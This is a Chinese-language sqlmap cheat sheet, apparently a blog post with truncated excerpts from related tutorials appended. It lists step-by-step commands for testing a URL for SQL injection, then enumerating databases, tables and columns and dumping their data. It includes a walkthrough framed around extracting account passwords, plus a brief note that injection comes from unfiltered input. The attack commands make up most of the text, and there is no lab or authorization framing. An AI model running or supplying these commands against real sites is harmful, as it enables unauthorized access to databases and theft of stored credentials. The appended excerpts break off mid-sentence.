1.//檢測當前url是否是存在sql注入漏洞
sqlmap.py -u 「url」
2.//檢測當前使用的資料庫
sqlmap.py -u 「url」 --current-db
3.//檢視所有的資料庫
sqlmap.py -u 「url」 --dbs
4.//查詢***資料庫下的所有表
sqlmap.py -u url -d 庫名 --tables
5.查詢***資料庫下***表的所有字段
sqlmap.py -u 「url」 -d 庫名 -t 表名 --columns
6.查詢***資料庫下***表下***欄位的資料
sqlmap.py -u 「url」 -d 庫名 -t 表名 -c 欄位名 --dump
sqlmap的注入方式
第一種 普通的注入方式 第一步 首先進行 u操作,比如 u 第二步 進行 d暴庫操作 sqlmap u dbs 第三步 進行 t暴表操作 sqlmap u d user tables 第四步 進行 colums進行暴欄位 sqlmap u d user t use colums 第五步 進行 dum...
SQLmap注入教程
一次sqlmap注入點並且dump出賬號密碼全程 判斷注入點 sqlmap.py u 存在注入url 爆出所有資料庫名字 sqlmap.py u 存在注入url dbs 檢視當前使用賬號 sqlmap.py u 存在注入url current user 1 檢視當前資料庫 sqlmap.py u 存...
注入神器 sqlmap
01 注入原理 存在注入的原因是因為後台在編寫程式時,沒有對使用者輸入的資料做過濾導致的,正如事實上,不是所有的使用者都是友好的 比如 使用者在某個輸入框提交的引數是 2 瀏覽器提交的url為 http www.com index.php?id 2 伺服器後台執行sql語句 select from ...